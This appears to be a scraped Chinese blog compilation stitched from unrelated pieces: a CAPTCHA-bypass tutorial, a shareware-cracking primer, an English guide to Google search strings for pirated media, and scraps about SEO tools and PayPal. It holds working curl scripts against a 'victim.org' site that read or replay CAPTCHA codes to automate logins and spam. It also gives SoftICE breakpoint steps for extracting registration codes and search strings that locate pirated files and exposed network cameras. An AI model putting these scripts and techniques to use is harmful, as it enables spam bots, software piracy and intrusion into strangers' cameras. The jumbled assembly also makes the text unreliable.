所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。
很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。
验证码在网页中的例子:
CODE:
<?
/*
* Filename: authpage.php
* Author: hutuworm
* Date: 2003-04-28
* @Copyleft hutuworm.org
*/
srand((double)microtime()*1000000);
//验证用户输入是否和验证码一致
if(isset($HTTP_POST_VARS[’authinput’]))
{
if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’])==0)
echo "验证成功!";
else
echo "验证失败!";
}
//生成新的四位整数验证码
while(($authnum=rand()%10000)<1000);
?>
<form action=authpage.php method=post>
<table>
请输入验证码:<input type=text name=authinput style="width: 80px"><br>
<input type=submit name="验证" value="提交验证码">
<input type=hidden name=authnum value=<? echo $authnum; ?>>
<img src=authimg.php?authnum=<? echo $authnum; ?>>
</table>
; </form>
[Copy to clipboard]
以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。
CODE:
#!/bin/sh
curl http://www.vicitm.org/authpage.php
authinput=`grep ’<input type=hidden name=authnum value=[[:digit:]]\{4\}>’ grep.txt | sed -e ’s/[^0-9]//g’` #得到网页中的
authnum
curl http://www.vicitm.org/authpage.php -d name=hacker -d submit="验证" -d authnum=$authnum
[Copy to clipboard]
CODE:
session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum);
...
<input type=text name=authnum maxlength=4><img src=get_code.php>
...
if($number != $login_check_number || empty($number))
{
print("校验码不正确!");
die();
}
[Copy to clipboard]
第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。
CODE:
#!/bin/sh
$username=hacker
$password=hackme
curl http://www.vicitm.org/index.php -c common_cookie # 接受服务器的初始cookies
curl http://www.vicitm.org/get_code.php -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl http://www.victim.org/login.php -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用
cookies中的验证码登陆
[Copy to clipboard]
更高级的验证码。(好像本论坛的就是这种。。。。)
有一类验证码比以上两种验证码要高级一些,它使用如下算法:
1、服务器生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
3、hash在cookie中被发送到客户端
4、客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。
特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。
对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时
,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。
如:
先从服务器上下载一张验证码图片:
curl http://www.victim.org/get_code.php -c cookie -o auth.png
人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。
机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破
CODE:
$savecookie=294b506f05f896dcbb3a0dde86a5e36c
$num=7701
$username=hacker
$password=hackme
curl http://www.victim.org/index.php -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的hash
echo "www.victim.org FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码
mv tmp.$username $username.cookie
curl http://www.victim.org/login.php -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d
authnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。
[Copy to clipboard]
最高级的验证码。
它使用如下方法:
1、服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3、hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以是session id)
4、seq被作为cookies发送给客户端。
5、客户以图片输入验证码。
6、服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
7、一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。
特点:
×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。
弱点:
OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证)
对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。
CODE:
curl http://www.victim.org/get_code.php -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。
看看黑客如何破解验证码机制
Crack的力量!收费共享软件破解思路浅析(图)
软件的版权问题一直是让人关注的安全问题,Cracker的出现让软件版权保护在某种意义上遇到了挑战,0day不断发布的keygen让所有的共享软件 作者或商业软件组织感到头疼,随着国内计算机爱好者的不断增多,民间很多Cracker的躁动和不安掀起了狂热的破解潮,国内众多破解组织也争相成 立,CCG\BCG\FCG等破解组织让广大网友目不暇接,这些在外人眼中神秘的侠客,对于共享软件破解又是如何做得呢? 
Cracker蓄势待发
WinHEX
W32Dasm是一个静态反汇编工具,也是破解人常用的工具之一,它也被比作破解人的屠龙刀。网上被修改过的W32Dasm版本不胜枚举,可见其受欢迎程度,那么它又是如何进行破解的呢?
W32Dasm
以上这些不过是很被动的方法,可以说现今的加密保护技术,防住静态破解是非常容易的。于是被Cracker推崇的动态破解方法就更显得宝贵了。为什么这么说呢?这种方法可谓以不变应万变,但都要有一定的汇编基础和对API方面的理解(特指Windows系统)。
SoftICE
TRW2000
Ollydbg
在奥运来临之际,国家也更注重知识产权的保护,尽管目前Cracker还有存活市场,但随着制度体系的完善和用户素质水平的提高,盗版将不会充斥着整个软件业,版权的保护将不会被这些Cracker所随意冲击。
解密宝典——十招教你学会软件破解
下面谈到了一些在学习解密过程中经常遇到的问题,本人根据 自己的经验简单给大家谈一谈。这些问题对于初学者来说常常是很需要搞明白的,根据我自己的学习经历,如果你直接照着很多破解教程去学习的话,多半都会把自 己搞得满头的雾水,因为有很多的概念要么自己不是很清楚,要么根本就不知道是怎么一回事,所以希望通过下面的讨论给大家一定的帮助: 1. 断点
所谓断点就是程序被中断的地方,这个词对于解密者来说 是再熟悉不过了。那么什么又是中断呢?中断就是由于有特殊事件(中断事件)发生,计算机暂停当前的任务(即程序),转而去执行另外的任务(中断服务程 序),然后再返回原先的任务继续执行。打个比方:你正在上班,突然有同学打电话告诉你他从外地坐火车过来,要你去火车站接他。然后你就向老板临时请假,赶 往火车站去接同学,接着将他安顿好,随后你又返回公司继续上班,这就是一个中断过程。我们解密的过程就是等到程序去获取我们输入的注册码并准备和正确的注 册码相比较的时候将它中断下来,然后我们通过分析程序,找到正确的注册码。所以我们需要为被解密的程序设置断点,在适当的时候切入程序内部,追踪到程序的 注册码,从而达到crack的目的。
2. 领空
这是个非常重要的概念,但是也初学者是常常不明白的地 方。我们在各种各样的破解文章里都能看到领空这个词,如果你搞不清楚到底程序的领空在哪里,那么你就不可能进入破解的大门。或许你也曾破解过某些软件,但 那只是瞎猫碰到死老鼠而已(以前我就是这样的^_^,现在说起来都不好意思喔!)。所谓程序的领空,说白了就是程序自己的地方,也就是我们要破解的程序自 己程序码所处的位置。也许你马上会问:我是在程序运行的时候设置的断点,为什么中断后不是在程序自己的空间呢?因为每个程序的编写都没有固定的模式,所以 我们要在想要切入程序的时候中断程序,就必须不依赖具体的程序设置断点,也就是我们设置的断点应该是每个程序都会用到的东西。在DOS时代,基本上所有的 程序都是工作在中断程序之上的,即几乎所有的DOS程序都会去调用各种中断来完成任务。
但是到了WINDOWS时代,程序没有权力直接调用中 断,WINDOWS系统提供了一个系统功能调用平台(API),就向DOS程序以中断程序为基础一样,WINDOWS程序以API为基础来实现和系统打交 道,从而各种功能,所以WINDWOS下的软件破解其断点设置是以API函数为基础的,即当程序调用某个API函数时中断其正常运行,然后进行解密。例如 在SOFTICE中设置下面的断点:bpx GetDlgItemText(获取对话框文本),当我们要破解的程序要读取输入的数据而调用GetDlgItemText时,立即被SOFTICE拦截 到,从而被破解的程序停留在GetDlgItemText的程序区,而GetDlgItemText是处于WINDWOS自己管理的系统区域,如果我们擅 自改掉这部分的程序代码,那就大祸临头了^_^!所以我们要从系统区域返回到被破解程序自己的地方(即程序的领空),才能对程序进行破解,至于怎样看程序 的领空请看前面的SOFTICE图解。试想一下:对于每个程序都会调用的程序段,我们可能从那里找到什么有用的东西吗?(怎么样去加密是程序自己决定的, 而不是调用系统功能实现的!)
3. API
即Application Programming Interface的简写,中文叫应用程序编程接口,是一个系统定义函数的大集合,它提供了访问操作系统特征的方法。 API包含了几百个应用程序调用的函数,这些函数执行所有必须的与操作系统相关的操作,如内存分配、向屏幕输出和创建窗口等,用户的程序通过调用API接 口同WINDOWS打交道,无论什么样的应用程序,其底层最终都是通过调用各种API函数来实现各种功能的。通常API有两中基本形式:Win16和 Win32。 Win16是原来的、API的16位版本,用于Windows 3.1;Win32是现在的、API的32位版本,用于Windows 95/98/NT/ME/2000。Win32包括了Win16,是Win16的超集,大多数函数的名字、用法都是相同的。
16位的API函数和32位的API函数的区别在于最 后的一个字母,例如我们设置这样的断点:bpx GetDlgItemText、bpx GetDlgItemTextA和bpx GetDlgItemTextW,其中 GetDlgItemText是16位API函数,GetDlgItemTextA和GetDlgItemTextW是32位API函数,而 GetDlgItemTextA表示函数使用单字节,GetDlgItemTextW表示函数使用双字节。现在我们破解中常用到的是Win32单字节 API函数,就是和GetDlgItemTextA类似的函数,其它的两种(Win16 API和Win32双字节API函数)则比较少见。 Win32 API函数包含在动态链接库(Dynamic Link Libraries,简称DLLs)中,即包含在kernel32.dll、user32.dll、gdi32.dll和comctl32.dll中,这 就是为什么我们要在softice中用exp=C:\windows\system\kernel32.dll等命令行将这些动态链接库导入 softice中的原因。因为不这样做的话,我们就无法拦截到系统Win32 API函数调用了。
4. 关于程序中注册码的存在方式
破解过程中我们都会去找程序中将输入的注册码和正确的 注册码相比较的地方,然后通过对程序的跟踪、分析找到正确的注册码。但是正确的注册码通常在程序中以两种形态存在:显式的和隐式的,对于显式存在的注册 码,我们可以直接在程序所处的内存中看到它,例如你可以直接在SOFTICE的数据窗口中看到类似"297500523"这样存在的注册码(这里是随意写 的),对于注册码显式存在的软件破解起来比较容易;但是有些软件的程序中并不会直接将我们输入的注册码和正确的注册码进行比较,比如有可能将注册码换算成 整数、或是将注册码拆开,然后将每一位注册码分开在不同的地方逐一进行比较,或者是将我们输入的注册码进行某种变换,再用某个特殊的程序进行验证等等。
总之,应用程序会采取各种不同的复杂运算方式来回避直接的注册码比较,对于这类程序,我们通常要下功夫去仔细跟踪、分析每个程序功能,找到加密算法,然后才能破解它,当然这需要一定的8086汇编编程功底和很大的耐心与精力。
5. 关于软件的破解方式
本人将破解方式分为两大类,即完全破解和暴力破解。所谓完全破解主要是针对那些需要输入注册码或密 码等软件来说的,如果我们能通过对程序的跟踪找到正确的注册码,通过软件本身的注册功能正常注册了软件,这样的破解称之为完全破解;但如果有些软件本身没 有提供注册功能,只是提供试用(DEMO),或是注册不能通过软件本身进行(例如需要获取另外一个专用的注册程序,通过INTERNET的注册等等),或 者是软件本身的加密技术比较复杂,软件破解者的能力、精力、时间有限,不能直接得到正确的注册码,此时我们需要去修改软件本身的程序码.
6. 关于破解教程中程序代码地址问题
破解教程中都会放上一部分程序代码以帮助讲解程序的分析方法,例如下面的一段程序代码:
......
0167:00408033 PUSH 00
0167:00408035 PUSH EBX
0167:00408036 CALL [USER32!EndDialog]
0167:0040803C JMP 0040812C
......
在这里程序中的代码地址如0167:00408033,其代码段的值(即0167)有可能根据不同 的电脑会有区别,不一定一模一样,但偏移值应该是固定的(即00408033不变),所以如果看到破解文章里的程序代码的地址值和自己的电脑里不一样,不 要以为搞错地方了,只要你的程序代码正确就不会有问题。
7. 关于如何设置断点的问题
正确恰当的设置好断点对于快速有效的解密非常重要,好的断点设置可以使我们迅速找到关键的程序段,而不恰当的断点则会对解密造成不必要的精力消耗,甚至根本就不能拦截到程序的运行。
但是具体什么时候用什么断点比较合适很难说,这需要自己用经验去累积,总的说来bpx hmemcpy这个万能断点对大多数注册码方式的软件都有用,初学者不妨多试试这个断点(通常我也是用这个断点设置,懒嘛^_^,哈哈。。。)。
对于那些需要暴力破解的非注册码方式的软件,通常我们应该拦截对话框(如bpx DialogBox)和消息框(如bpx MessageBox(A))等。不论对于哪一类软件,当我们设置的断点均没有效果时,可是试一下bpx lockmytask,这个断点的作用是拦截任何一个按键的动作,具体常用的一些断点设置请参考"破解常用断点设置"一文。
另外,在注册码的破解中通常需要输入用户名和注册码,一般说来用户名和密码都可以随意输入,但是根 据我自己的经验,很多软件对于注册码都会逐位的进行处理,假如输入"78787878"这串数字,那么在跟踪程序的时候我们就无法知道我们当时所看到 的"78"倒底是哪一个"78",所以我比较喜欢用"12345678"这样的注册码输入方式,这样的话就就能知道程序是在对注册码的哪一位进行运算,同 样的对于那些需要输入较长序列号的软件,输入类似"12345-67890-ABCDEF"这样的序列号较好。
不过有一点大家需要特别的注意:上面讲的注册码输入方式"12345678"是针对拦截WIN32 API函数来说的,假如有些时候直接拦截WIN32 API函数难以找到程序的突破口,而要借助于"S"指令在内存中寻找我们输入的用户名或注册码时,就最好不要采用"12345678"作为注册码,因为内 存中很可能有许多的"12345678"字符串,这样我们没有办法知道倒底我们要破解的程序使用的是哪一个"12345678",所以我们应该选择一个不 易和内存数据相同的注册码,比如:74747474(本人喜欢用,意思嘛:去死去死。。。哈哈哈^_^),对应的搜索指令为: S 30:0 L FFFFFFFF '74747474' 。当然,以上只是我个人的习惯而已,具体用什么样的输入形式可以根据本人的爱好、习惯来定,不必拘泥于某一固定的模式。
8. 关于如何跟踪程序的问题
初学者在开始学习解密的时候往往不知道怎么样去跟踪程序,怎么样找到注册码比较的地方,当面对长长 的一堆程序代码时显得不知所措。通常软件的程序内部都会利用一个子程序(即 CALL ********)去验证我们输入的注册码正确与否,对于注册码显式存在的程序,一般都会将所输入的注册码和正确的注册码放进寄存器,然后调用验证子程序 进行判断,将结果返回,应用程序根据子程序返回的结果决定是否注册成功,这样的程序经常具有如下的形式:
****:******** MOV EAX,[********] (或 PUSH EAX等形式)
****:******** MOV EDX,[********] (或 PUSH EDX等形式)
****:******** CALL ********
****:******** TEST EAX,EAX (或 TEST AL,AL,或是没有这一句等形式)
****:******** JNZ ******** (或 JZ ********等形式)
其中EAX和EDX指向的内存区域就是我们输入的注册码和正确的注册码,这里的寄存器EAX和 EDX是随意写的,也可以是ECX,EBX,EDI,ESI等等。对于注册码隐式存在的程序,虽然不能直接看到正确的注册码,但是通常也是先将所输入的注 册码地址放进某个寄存器,然后调用子程序去验证,破解时就需要进入子程序去分析注册算法。总之,看到子程序(call ********)后面跟着跳转指令(JNZ ********或JZ ********)的地方我们就应该提高警惕,多用 D EAX(或EBX、ECX、EDX、EDI、ESI...等)去看看寄存器指向的内存区域藏着什么东西。
有一点大家要提醒大家:看见程序中使用下面这个函数是要注意,即GetDlgItenInt,这个 API函数的作用是将输入的文本转化为整数,所以这类程序中是不会有显示存在的注册码的,因为注册码被转换为整数了,程序通常会用CMP ECX,EDX 这种类型的指令去验证注册码的正确性,这里ECX和EDX中存的就是所输入注册码和正确注册码的整数形式,此时可以用 ? edx 和 ? ecx 看到其十进制形式,即我们输入的形式。
9. 关于软件的反安装问题
经常我们使用某些软件时都会遇到一个问题,就是共享软件过期之后即使删掉原程序重新安装,程序依然 不能用,还是一样提醒你试用期已过请注册;或者是你已经破解了某个软件,但是还想继续研究它,但是因为软件已经注册好,没有了注册选项,这时你即使彻底删 掉程序再重新安装软件,结果程序运行后还是注册过的。
遇到这样的情况,其实原因很简单,因为程序将注册或过期信息存在了系统注册表里,所以简单的重新安 装软件是无济于事的。解决的办法就是自己删掉注册表中有关的信息,但是因为注册表是WINDOWS系统工作的基础,如果不小心就很可能会损坏它而引起系统 异常,所以如果你对注册表不是很熟的话,应该在修改之前备份一下注册表。
不论是修改还是备份注册表都可以使用WINDOWS下的注册表管理工具"REGEDIT"来进行, 一种办法是在"开始->运行"下输入"regedit"启动它,也可以直接点击"C:\WINDOWS\regedit.exe"来运行。大部分的 应用软件都会将自己的信息存在如下的路径中:HKEY_LOCAL_MACHINE\Software、HKEY_LOCAL_MACHINE \Software\Microsoft、HKEY_CURRENT_USER\Software、HKEY_CURRENT_USER \Software\Microsoft 或 HKEY_USERS\.DEFAULT\Software下,具体是哪个地方依据不同的程序而有所不同,只要按上面的顺序肯定能找到有关应用程序的键, 然后将和用户名及注册码有关的键值删掉就搞定了。
10. 关于破解练习的问题
学习破解需要大量的练习,对于破解目标的选择,初学者不宜以大型的、著名的软件为目标,因为这些软 件通常加密较为复杂,破解不易,应该选择一些比较不出名的、小型的和早些时候的共享软件来练习,因为加密相对简单的软件有利于初学者快速掌握破解思想和技 能。至于习题的来源则很广泛,可以从网上下载,也可以去市面上购买一些共享软件光盘。
Advanced Google Tut
Searching Google for Music - Advanced Guide
*credit to my_haz for this superb guide on how to search Google.
This How-To will teach you how to use google to find mp3s. This How-To
will be highly pragmatic and will focus on the hows and not the
wherefores of the various search strings.
Index
----------------------------------------------------------------------
0) Key
1) Directories
2) Xitami Servers
3) Directory Listing
4) Andromeda Servers
5) Zina Artists
6) Apache mp3 Servers
7) Individual Songs
----------------------------------------------------------------------
Section 0 - KEY
----------------------------------------------------------------------
You this are just some definitions I will use below.
[Directory String] can be any of the following :
1) "index of"
2) "last modified"
3) "parent of"
[file type] can be any of the following :
1) "mp3"
2) "shn"
3) "wma"
[mp3 name] can be any of the following :
1) the name of the album in quotes
2) the name of the artist in quotes
3) be daring and leave it blank and have lots of links
4) be creative!
[limitors]
1) -html -htm -php -asp -txt -pls
(inurl:) is optional and may be omitted and in fact most be
omitted if not using a search tool other than google.
(intitle:) can be used in place of (inurl:) and has a similar effect
again you must be useing google.
(-filetype:txt) adding this to the end of your search string can
filter some false positives.
(-playlist) adding this to the end of your search string can
filter some false positives.
----------------------------------------------------------------------
Section 1 - Directories
----------------------------------------------------------------------
These are the most common way that mp3s are stored on the www, you
should try these strings first.
String Format :
Type 1 : [Directory String] + (inurl:)[file type] + [mp3 name]
Type 2 : [Directory String] + (intitle:)[file type] + [mp3 name]
Type 3 : [Directory String] + [file type] + [mp3 name] + [limitors]
Example Strings :
- intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp -txt -pls
- "index of" + "mp3" + "radiohead" -html -htm -php
- "index of" + mp3 + "grandaddy"
- "index of" + inurl:mp3 + "beatles" -txt -pls
- "index of" + intitle:mp3 + beatles
- "last modified" + "shn" + "dylan"
- "last modified" + inurl:shn + "bob dylan"
- "parent of" + inurl:wma + "grandaddy"
Suggestions :
- Try (intitle:index.of + "mp3" + "band name" -htm -html -php -asp) first it
is usually the most effective.
Another Little Trick:
- If you have been getting alot of results on google but the pages don't seem
to be there try adding dates and the "apache" string to your search i.e.
- intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp apache feb-2005
- intitle:index.of + mp3 + "grandaddy" -html -htm -php -asp apache 2005
or if you just want a big list of mp3' doing a search like this everymonth
- intitle:index.of + mp3 + -html -htm -php -asp apache mar
----------------------------------------------------------------------
Section 2 - Xitami Servers
----------------------------------------------------------------------
String Format :
Type 1 : "xitami web server" + (inurl:)[file type] + [mp3 name]
Type 2 : "xitami web server" + (intitle:)[file type] + [mp3 name]
Example Strings :
- "xitami web server" + "mp3" + "radiohead"
- "xitami web server" + intitle:shn + "beatles"
- "xitami web server" + inurl:mp3 + "magnetic fields"
----------------------------------------------------------------------
Section 3 - Directory Listing
----------------------------------------------------------------------
String Format :
Type 1 : "directory listings" + (inurl:)[file type] + [mp3 name]
Type 2 : "directory listings" + (intitle:)[file type] + [mp3 name]
Type 3 : "directory listings of" + (inurl:)[file type] + [mp3 name]
Type 4 : "directory listings of" + (intitle:)[file type] + [mp3 name]
Example Strings
- "directory listings" + "mp3" + "radiohead"
- "directory listings" + intitle:shn + "beatles"
- "directory listings" + inurl:mp3 + "magnetic fields"
- "directory listings of" + "mp3" + "radiohead"
- "directory listings of" + intitle:shn + "beatles"
- "directory listings of" + inurl:mp3 + "magnetic fields"
----------------------------------------------------------------------
Section 4 - Andromeda Servers
----------------------------------------------------------------------
String Format :
Type 1 : "scott matthews" + andromeda + [mp3 name]
Type 2 : "scott matthews" + andromeda + [file type] + [mp3 name]
Type 3 : "powered by andromeda" + [mp3 name]
Type 4 : "powered by andromeda" + [file type] + [mp3 name]
Type 5 : inurl:andromeda.php + [mp3 name]
Type 6 : inurl:anromeda.php + [file type] + [mp3 name]
Type 7 : "scott matthews"
Type 8 : "powered by andromeda"
Type 9 : inurl:andromeda.php
Examples :
- "scott matthews" + andromeda + "radiohead"
- "scott matthews" + andromeda + "mp3" + "fitter"
- "powered by andromeda" + "gradaddy"
- "powered by andromeda" + "mp3" + "just like women"
- inurl:andromeda.php + "shn"
- inurl:anromeda.php + "wma" + "dylan"
- "scott matthews"
- "powered by andromeda"
- inurl:andromeda.php
----------------------------------------------------------------------
Section 5 - Zina Artists
----------------------------------------------------------------------
String Format :
Type 1 : "zina artists"
Examples :
- "zina artists"
----------------------------------------------------------------------
Section 6 - Apache mp3 Servers
----------------------------------------------------------------------
String Format :
Type 1 : "stream all" + apache + [mp3 name]
Type 2 : "stream all" + apache
Type 3 : "shuffle all" + apache + [mp3 name]
Type 4 : "shuffle all" + apache
Examples :
- "stream all" + apache
- "stream all" "shuffle all" mp3
- "stream all" + apache + radiohead
- "shuffle all" + beatles
----------------------------------------------------------------------
Section 7 - Individual Songs
----------------------------------------------------------------------
Format : [mp3 name].mp3 -playlist -filetype:txt
Examples :
- "ok_computer_live.mp3" -playlist -filetype:txt
- "*ok_computer*.mp3" -playlist -filetype:txt
- kid*a.mp3 -playlist -filetype:txt
##########################################
2nd Method:
Here is a second example of maximizing search results on Google:
1. At Google Search, type in one of the following two phrases (try the first one; if you're not happy with the results, try the second one on your second search):
* "index of/mp3" -playlist -html -lyrics
* "index of/" mp3 -playlist -html -lyrics
2. If you'd like, add an artist's name or song name to the end of the phrase, then click the Search Button.
3. Here are a few examples:
* "index of/mp3" -playlist -html -lyrics beatles
* "index of/mp3" -playlist -html -lyrics punk
This tip helps you find directories filled with mp3 files by finding Apache's Index page:
1. At Google Search type in the following code:
2. +("index of") +("/mp3"|"/mp3s"|"/music") +(mp3|zip|rar) +apache
3. By editing this code, you can search for any type of media; oog, wav, pdf, etc.
4. Be sure to edit both the directory names as well as the file extensions if edited.
Finding mp3 and compressed files searching by title:
1. At Google Search type in the following code:
2. allinurl: +(mp3|rar|zip|tgz) TheTitle
3. Replace TheTitle with either a song title, artist name, or album.
4. Here are a few examples:
* allinurl: +(mp3|rar|zip|tgz) beatles
* allinurl: +(mp3|rar|zip|tgz) revolver
* allinurl: +(mp3|rar|zip|tgz) greatest hits
--------------------
& to find cell phone programs:
just type the following line in your google search box and see experience a new world of finding games
for games
"parent directory" nokia games -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
for tones
"parent directory " nokia polyphonic -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
for symbian games
"parent directory " symbian games -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
for Wallpapers
"parent directory " nokia wallpapers -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
for general Midi
"parent directory " midi -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
also try using "Index of" instead of "parent directory"
--------------------
and other tips:
You've probably seen some sites that allow you to Google their site for a certain term. This is accomplished via the "site" advanced operator. The following syntax is used for the site operator:
site:site_to_search
For example, if we wanted to search www.projectfearless.com
for the term "Nielsosky", we would use the following:
Nielsosky site:projectfearless.com
or
example:
site:blabla.com
----------------------------------------------------------
The "inurl" advanced operator is used to search for a term within
URL's. For example, searching for "inurl:binaryuniverse" searched
for all sites that have the term "binaryuniverse" in their URL.
The "intitle" is used to search for a term in the title. Thus,
"intitle:binaryuniverse" finds all pages with "binaryuniverse"
in their title.
------------------------------------------------------------
Google keeps caches of pages. When the Google spider indexes a page,
it stores a copy of it. Thus, the cache is a copy of what the page was
like at an earlier date. To view the cache for a page, you can simply
search for the page, and then click the "cache" link underneath.
However, there is a quicker way, that involves only typing in
search terms, and not clicking. Simply type "cache:pageurl.com"
to view the cache of a page (in this case pageurl.com).
------------------------------------------------------------
Google also allows you to search for pages of a certain filetype,
using the syntax "filetype:TYPE". Replace 'TYPE' with the file type
you want to search for. So, if you wanted to search for tutorials
on SQL that are in PDF format, you would search for the following:
SQL Tutorial filetype:PDF
--------------------------------------------------------------
Not only is Google the world's best search engine, it also happens
to be a mighty fine dictionary. To use it as a dictionary, just type
"define:TERM", and replace TERM with the word you wish to look up.
For example, if you want to look up "roflmao", type "define:roflmao",
without the quotes. This will give you several different resources
for definitions or roflmao. Fyi, roflmao means "rolling on the floor laughing my ass off".
----------------------------------------------------------------
And now, it's time for some fun -- Google whacking. Actually, after
a couple minutes, I have found Google whacking to become extremely
boring, not to mention frustrating. A google whack is a two-word query
that returns one result. You may not use quotes, and both words in
the query must be real words. And yes, it is very hard.
For more info, I suggest you check out http://googlewhacking.com
At this point, the basics of Google have been covered, and you should
be a moderately good Googler.
--------------------
how to search for STUFF at google
method 1
put this string in google search:
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
method 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
method 3
put this string in google search:
inurl:microsoft filetype:???
method 4
put this string in google search:
intitle:index.of.???
method 5
put this string in google search:
"name of object"download
"name of object download"
free "name of object"download
free "name of object download"
Or just look for the filename(s).
and instead of using the inurl: tag, use site: that works too.
For Rapidshare:
http://www.google.com/search?q=+.zip+OR+.rar+OR+.pdf+site:rapidshare.de&hl=en&lr=&c2coff=1&as_qdr=all&start=510&sa=N
or movies:
http://www.google.com/search?q=+.wmv+OR+.avi+OR+.mpeg+OR+.rm+site:rapidshare.de&hl=en&lr=&as_qdr=all&start=10&sa=N
or music:
http://www.google.com/search?q=+.MP3+OR+.WMA+OR+.Ogg+OR+.rm+site:rapidshare.de&hl=en&lr=&as_qdr=all&start=10&sa=N
Just play with the extensions.
---------------------------------------------
E-Books
inurl:ebook.DDU | inurl:ebook.EEN | inurl:ebook.JGT | inurl:ebook.LiB | inurl:ebook.EAT
There's a few ways to differentiate from that to change the outcome in your favor as well. For example, you can take away the "inurl:" to get many hits on things like forum posts or BitTorrent links. (Helpful if you're looking for something rare.)
You can also add the file type you like (such as PDF, CHM, LIT, etc) to get a specialized search. Finally, don't forget to put () or else Google may get confused. When defining a OR statement, Google expects the () to surround it. For example, you could search for:
- (ebook.DDU | ebook.EEN | ebook.JGT | ebook.LiB | ebook.EAT )
or
- PDF (ebook.DDU | ebook.EEN | ebook.JGT | ebook.LiB | ebook.EAT )
or get fancy with
- (PDF | CHM | LIT | ZIP | RAR | ISO) (ebook.DDU | ebook.EEN | ebook.JGT | ebook.LiB | ebook.EAT)
You can also use "Parent Directory"+ in front of it but don't limit the search to Google, try several engines.
A nice site for Rabbits & webbits:
http://www.searchlores.org/rabbits.htm
added 6/6/05
Music Filetypes:
MP3
WMV
WAV
AIF
AIFF
Movie Filetypes:
MPG
MPEG
AVI
WMV
RM
MOV
Picture Filetypes:
JPG
JPEG
GIF
TIFF
TIF
PNG
BMP
Compressed Filetypes (Used to search for programs):
ZIP
RAR
ISO
BIN
EXE <- Be extremely careful when searching for EXE files, make sure you run a complete virus scan on any of the compressed filetypes.
Document Filetypes:
DOC
RTF
TXT
PDF
SWX
These are just a few of the things that you can search for using Google. It is an extremely powerful tool that can be used to find just about anything you could ever want on the internet. While I am not condoning pirating and filesharing, I feel that the sharing of information is absolutely essential to the survival of the internet. After all, the internet was founded on the idea of sharing information, Google just allows us to index all of that information into an easily searched archive.
Find net cams with the following searches:
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol
(oops, just noticed this info has been posted! Sorry)
some good tools
我正在使用的一些免费的研究关键字的工具软件:
Yahoo提供的关键字工具:Overture keyword selector tool
Google提供的关键字工具:Google keywords tool
SEO book keyword suggestion tool
Free keyword suggestion tool?from wordtracker
我经常访问的一些国外网络营销的专业论坛:
http://forums.digitalpoint.com/
http://www.abestweb.com/
PayPal是什么意思? - PayPal中文指南
好消息:Paypal加快本地化进程,现在国内打开paypal网站是用中文显示,为我们国人注册和使用paypal提供了方便!
好消息:Paypal新增电汇提现到国内双币银行帐号的功能! 详情点击进入
